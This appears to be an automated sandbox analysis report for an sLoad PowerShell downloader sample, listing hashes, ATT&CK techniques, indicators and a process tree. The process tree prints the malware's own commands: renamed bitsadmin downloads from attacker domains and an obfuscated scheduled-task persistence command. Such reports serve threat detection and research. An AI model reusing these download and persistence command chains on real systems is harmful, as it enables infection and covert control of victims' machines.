sload | b9673d9fb629c0e639e0bfb0af0a85f47a21676d83af4d3d5db6c422bd696cb5

Analysis

max time kernel
199s
max time network
209s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
09-05-2023 12:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

doc.ps1
Size

110KB
MD5

b82b2c3c446169694311b4597299d9a7
SHA1

3fc783e954d21bc9046f23c52e303864680f3a66
SHA256

b9673d9fb629c0e639e0bfb0af0a85f47a21676d83af4d3d5db6c422bd696cb5
SHA512

352ae9d240919b2392df734449728cd544a698ab779b5523af9d0c9bd6aaf2a47d2367e255d7eb0e8509c209f935da5ab32b7d881dbc6d4f99175edec34d6fe2
SSDEEP

3072:NY119DxPJgetKD9RGfzyqTlcUyfZwwC9V:q19DxPJgetKD9RGfzyqTlcdfZwwC9V

Score

10^/10

sload stealer trojan

Malware Config

Signatures

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	oiIBNEQt.exe

Executes dropped EXE 4 IoCs

pid	Process
4320	oiIBNEQt.exe
616	SmYdFe.exe
2552	SmYdFe.exe
2644	SmYdFe.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File created	C:\users\Admin\AppData\Roaming\hVPsKBGnL\desktop.ini	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
396	schtasks.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
2896	powershell.exe
2896	powershell.exe
2896	powershell.exe
2896	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 4968 wrote to memory of 460	4968	powershell.exe	84
PID 4968 wrote to memory of 460	4968	powershell.exe	84
PID 4968 wrote to memory of 392	4968	powershell.exe	85
PID 4968 wrote to memory of 392	4968	powershell.exe	85
PID 4968 wrote to memory of 3892	4968	powershell.exe	86
PID 4968 wrote to memory of 3892	4968	powershell.exe	86
PID 4968 wrote to memory of 2180	4968	powershell.exe	87
PID 4968 wrote to memory of 2180	4968	powershell.exe	87
PID 2180 wrote to memory of 396	2180	cmd.exe	88
PID 2180 wrote to memory of 396	2180	cmd.exe	88
PID 4320 wrote to memory of 2896	4320	oiIBNEQt.exe	100
PID 4320 wrote to memory of 2896	4320	oiIBNEQt.exe	100
PID 4320 wrote to memory of 2896	4320	oiIBNEQt.exe	100
PID 2896 wrote to memory of 2588	2896	powershell.exe	102
PID 2896 wrote to memory of 2588	2896	powershell.exe	102
PID 2896 wrote to memory of 2588	2896	powershell.exe	102
PID 2896 wrote to memory of 616	2896	powershell.exe	106
PID 2896 wrote to memory of 616	2896	powershell.exe	106
PID 2896 wrote to memory of 616	2896	powershell.exe	106
PID 2896 wrote to memory of 1360	2896	powershell.exe	107
PID 2896 wrote to memory of 1360	2896	powershell.exe	107
PID 2896 wrote to memory of 1360	2896	powershell.exe	107
PID 1360 wrote to memory of 1236	1360	cmd.exe	109
PID 1360 wrote to memory of 1236	1360	cmd.exe	109
PID 1360 wrote to memory of 1236	1360	cmd.exe	109
PID 1236 wrote to memory of 2552	1236	cmd.exe	110
PID 1236 wrote to memory of 2552	1236	cmd.exe	110
PID 1236 wrote to memory of 2552	1236	cmd.exe	110
PID 2896 wrote to memory of 260	2896	powershell.exe	111
PID 2896 wrote to memory of 260	2896	powershell.exe	111
PID 2896 wrote to memory of 260	2896	powershell.exe	111
PID 260 wrote to memory of 2540	260	cmd.exe	113
PID 260 wrote to memory of 2540	260	cmd.exe	113
PID 260 wrote to memory of 2540	260	cmd.exe	113
PID 2540 wrote to memory of 2644	2540	cmd.exe	114
PID 2540 wrote to memory of 2644	2540	cmd.exe	114
PID 2540 wrote to memory of 2644	2540	cmd.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\doc.ps1
1⤵
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4968
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c copy /Z c:\Windows\SysWOW64\bitsadmin.exe SmYdFe.exe"
  2⤵
  PID:460
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /query /FO CSV /v
  2⤵
  PID:392
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c copy /Z c:\Windows\SysWOW64\wscript.exe oiIBNEQt.exe"
  2⤵
  PID:3892
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C schtasks /F /%windir:~0,1%reate /sc minute /mo 3 /TN "S0hVPsKBGnL" /ST 07:00 /TR "c:\users\Admin\AppData\Roaming\\hVPsKBGnL\oiIBNEQt.exe /E:vbscript c:\users\Admin\AppData\Roaming\\hVPsKBGnL\lDEtrqms.tmp""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Windows\system32\schtasks.exe
    schtasks /F /Create /sc minute /mo 3 /TN "S0hVPsKBGnL" /ST 07:00 /TR "c:\users\Admin\AppData\Roaming\\hVPsKBGnL\oiIBNEQt.exe /E:vbscript c:\users\Admin\AppData\Roaming\\hVPsKBGnL\lDEtrqms.tmp""
    3⤵
    - Creates scheduled task(s)
    PID:396

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2904

\??\c:\users\Admin\AppData\Roaming\hVPsKBGnL\oiIBNEQt.exe
c:\users\Admin\AppData\Roaming\\hVPsKBGnL\oiIBNEQt.exe /E:vbscript c:\users\Admin\AppData\Roaming\\hVPsKBGnL\lDEtrqms.tmp"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4320
- C:\windows\SysWOW64\windowspowerShell\v1.0\powershell.exe
  "C:\windows\SysWOW64\windowspowerShell\v1.0\powershell.exe" -ep bypass -file lDEtrqms.ps1
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\getmac.exe
    "C:\Windows\system32\getmac.exe" /fo table
    3⤵
    PID:2588
- - C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe
    "C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe" /reset
    3⤵
    - Executes dropped EXE
    PID:616
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C cmd /c C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe /transfer PGtxqkND /%windir:~6,1%ownload /priority FOREGROUND "https://raeyb.eu/topic//440d0de189e34d4c8bad4184835ab315.html" C:\users\Admin\AppData\Roaming\hVPsKBGnL\0_svchost.log
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1360
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe /transfer PGtxqkND /download /priority FOREGROUND "https://raeyb.eu/topic//440d0de189e34d4c8bad4184835ab315.html" C:\users\Admin\AppData\Roaming\hVPsKBGnL\0_svchost.log
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1236
    - - C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe
        
        C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe /transfer PGtxqkND /download /priority FOREGROUND "https://raeyb.eu/topic//440d0de189e34d4c8bad4184835ab315.html" C:\users\Admin\AppData\Roaming\hVPsKBGnL\0_svchost.log
        5⤵
        Executes dropped EXE
        
        PID:2552
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C cmd /c C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe /transfer ugBWiqXF /%windir:~6,1%ownload /priority FOREGROUND "https://rbutkj.eu/topic//440d0de189e34d4c8bad4184835ab315.html" C:\users\Admin\AppData\Roaming\hVPsKBGnL\1_svchost.log
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:260
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe /transfer ugBWiqXF /download /priority FOREGROUND "https://rbutkj.eu/topic//440d0de189e34d4c8bad4184835ab315.html" C:\users\Admin\AppData\Roaming\hVPsKBGnL\1_svchost.log
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2540
    - - C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe
        
        C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe /transfer ugBWiqXF /download /priority FOREGROUND "https://rbutkj.eu/topic//440d0de189e34d4c8bad4184835ab315.html" C:\users\Admin\AppData\Roaming\hVPsKBGnL\1_svchost.log
        5⤵
        Executes dropped EXE
        
        PID:2644

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1hcfjx5x.uov.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe

Filesize
182KB

MD5
f57a03fa0e654b393bb078d1c60695f3

SHA1
1ced6636bd2462c0f1b64775e1981d22ae57af0b

SHA256
c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

SHA512
7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

Download Submit
C:\Users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe

Filesize
182KB

MD5
f57a03fa0e654b393bb078d1c60695f3

SHA1
1ced6636bd2462c0f1b64775e1981d22ae57af0b

SHA256
c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

SHA512
7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

Download Submit
C:\Users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe

Filesize
182KB

MD5
f57a03fa0e654b393bb078d1c60695f3

SHA1
1ced6636bd2462c0f1b64775e1981d22ae57af0b

SHA256
c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

SHA512
7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

Download Submit
C:\Users\Admin\AppData\Roaming\hVPsKBGnL\oiIBNEQt.exe

Filesize
144KB

MD5
ff00e0480075b095948000bdc66e81f0

SHA1
c2326cc50a739d3bc512bb65a24d42f1cde745c9

SHA256
8c767077bb410f95b1db237b31f4f6e1512c78c1f0120de3f215b501f6d1c7ea

SHA512
3a38e62dcb925411bc037335e46dfdd895c12a52ac43c47ef38db42d41d8358dfc2b1081a361367911d60ec5a3350ca734cf70ad57b21d39b23cfdec35b0aced

Download Submit
C:\users\Admin\AppData\Roaming\hVPsKBGnL\SmYdFe.exe

Filesize
182KB

MD5
f57a03fa0e654b393bb078d1c60695f3

SHA1
1ced6636bd2462c0f1b64775e1981d22ae57af0b

SHA256
c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

SHA512
7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

Download Submit
C:\users\Admin\AppData\Roaming\hVPsKBGnL\desktop.ini

Filesize
170KB

MD5
b1e4bb15cd7c3bb8faa27d9259060d6e

SHA1
1dc36500c1ecf233c2738091fecb8fafc315e5c4

SHA256
5892d0da637ad58bcce67c1b78ca9b1ba3ee701c3884207c0f71cf6a45a321e6

SHA512
7c30818cfb820abeedcb8b301dc8df183176388eab4c8ac9f7ce2c3d8c7a187ae20318ec2f18e9896022882b175c735315d3a93b494de25bf97c8e3c938c6b4d

Download Submit
C:\users\Admin\AppData\Roaming\hVPsKBGnL\lDEtrqms.ps1

Filesize
2KB

MD5
a2f4ded03aca99732577128b000c5f3b

SHA1
ed0122bd8dc73932d12517bb67fec25c4d18316c

SHA256
503a57004284aa678d2aea3fb92c935e332c815c9a2395aad9c6b0a4069bbdcb

SHA512
ebb8923b100fd1fb5ed9faabab8b101f72774146176afb2c22c57be5c506e3f3f501f0109dd849917f444d36770bf1c789c2053f4c388ef98b3f311cd6919ff5

Download Submit
C:\users\Admin\AppData\Roaming\hVPsKBGnL\slmgr.ini

Filesize
1KB

MD5
cb48dc18925ca766622d19ba402c924b

SHA1
180eec7f437909ef11e56735604785fde18ba06e

SHA256
d9d17a2ff59dbed40f397d32910a5bbf3959bb999921ef80e7f72a9833ca5a0c

SHA512
b69dc8c0e05661516e3a530a35beb08ac40d2346bcbb5edb6b24869fa96dda6dcea9550e7f73a21f9992fc969bbda851276be8476ffbcd39468ee5b7465db684

Download Submit
\??\c:\users\Admin\AppData\Roaming\hVPsKBGnL\lDEtrqms.tmp

Filesize
2KB

MD5
247af96e212874aede72263ed3b30b72

SHA1
0ffb0ddebb879afc5b4b4e8bb256b76fb5e9eb75

SHA256
3e7de2dcaf5b7702ce7672b95b38a047ae25be18d334d6df29d8413210873c0e

SHA512
4e9cf38ff3fa7436db2e717280c3fba1dd346ceaffa47def636467123675f41b6c568cd1febfaa1674551e1da33b8650909ad822523e821e6172361ba9bb7ee4

Download Submit
\??\c:\users\Admin\AppData\Roaming\hVPsKBGnL\oiIBNEQt.exe

Filesize
144KB

MD5
ff00e0480075b095948000bdc66e81f0

SHA1
c2326cc50a739d3bc512bb65a24d42f1cde745c9

SHA256
8c767077bb410f95b1db237b31f4f6e1512c78c1f0120de3f215b501f6d1c7ea

SHA512
3a38e62dcb925411bc037335e46dfdd895c12a52ac43c47ef38db42d41d8358dfc2b1081a361367911d60ec5a3350ca734cf70ad57b21d39b23cfdec35b0aced

Download Submit
memory/2896-159-0x00000000033D0000-0x00000000033E0000-memory.dmp

Filesize
64KB

Download
memory/2896-193-0x0000000008C80000-0x00000000092FA000-memory.dmp

Filesize
6.5MB

Download
memory/2896-162-0x0000000005AA0000-0x0000000005B06000-memory.dmp

Filesize
408KB

Download
memory/2896-163-0x00000000061F0000-0x0000000006256000-memory.dmp

Filesize
408KB

Download
memory/2896-173-0x0000000006910000-0x000000000692E000-memory.dmp

Filesize
120KB

Download
memory/2896-160-0x00000000033D0000-0x00000000033E0000-memory.dmp

Filesize
64KB

Download
memory/2896-175-0x0000000007A00000-0x0000000007A96000-memory.dmp

Filesize
600KB

Download
memory/2896-177-0x0000000007990000-0x00000000079B2000-memory.dmp

Filesize
136KB

Download
memory/2896-176-0x0000000006F10000-0x0000000006F2A000-memory.dmp

Filesize
104KB

Download
memory/2896-178-0x00000000033D0000-0x00000000033E0000-memory.dmp

Filesize
64KB

Download
memory/2896-179-0x0000000008050000-0x00000000085F4000-memory.dmp

Filesize
5.6MB

Download
memory/2896-205-0x000000007F330000-0x000000007F340000-memory.dmp

Filesize
64KB

Download
memory/2896-181-0x0000000007DE0000-0x0000000007E12000-memory.dmp

Filesize
200KB

Download
memory/2896-182-0x0000000070E70000-0x0000000070EBC000-memory.dmp

Filesize
304KB

Download
memory/2896-192-0x0000000007DC0000-0x0000000007DDE000-memory.dmp

Filesize
120KB

Download
memory/2896-161-0x0000000005980000-0x00000000059A2000-memory.dmp

Filesize
136KB

Download
memory/2896-194-0x0000000007FB0000-0x0000000007FBA000-memory.dmp

Filesize
40KB

Download
memory/2896-195-0x000000007F330000-0x000000007F340000-memory.dmp

Filesize
64KB

Download
memory/2896-196-0x0000000009300000-0x000000000982C000-memory.dmp

Filesize
5.2MB

Download
memory/2896-158-0x0000000005B50000-0x0000000006178000-memory.dmp

Filesize
6.2MB

Download
memory/2896-157-0x0000000003340000-0x0000000003376000-memory.dmp

Filesize
216KB

Download
memory/2896-197-0x00000000086F0000-0x0000000008782000-memory.dmp

Filesize
584KB

Download
memory/2896-200-0x00000000033D0000-0x00000000033E0000-memory.dmp

Filesize
64KB

Download
memory/2896-201-0x00000000033D0000-0x00000000033E0000-memory.dmp

Filesize
64KB

Download
memory/2896-204-0x00000000033D0000-0x00000000033E0000-memory.dmp

Filesize
64KB

Download
memory/4968-141-0x0000024286270000-0x0000024286280000-memory.dmp

Filesize
64KB

Download
memory/4968-147-0x0000024286270000-0x0000024286280000-memory.dmp

Filesize
64KB

Download
memory/4968-133-0x00000242A0970000-0x00000242A0992000-memory.dmp

Filesize
136KB

Download
memory/4968-139-0x0000024286270000-0x0000024286280000-memory.dmp

Filesize
64KB

Download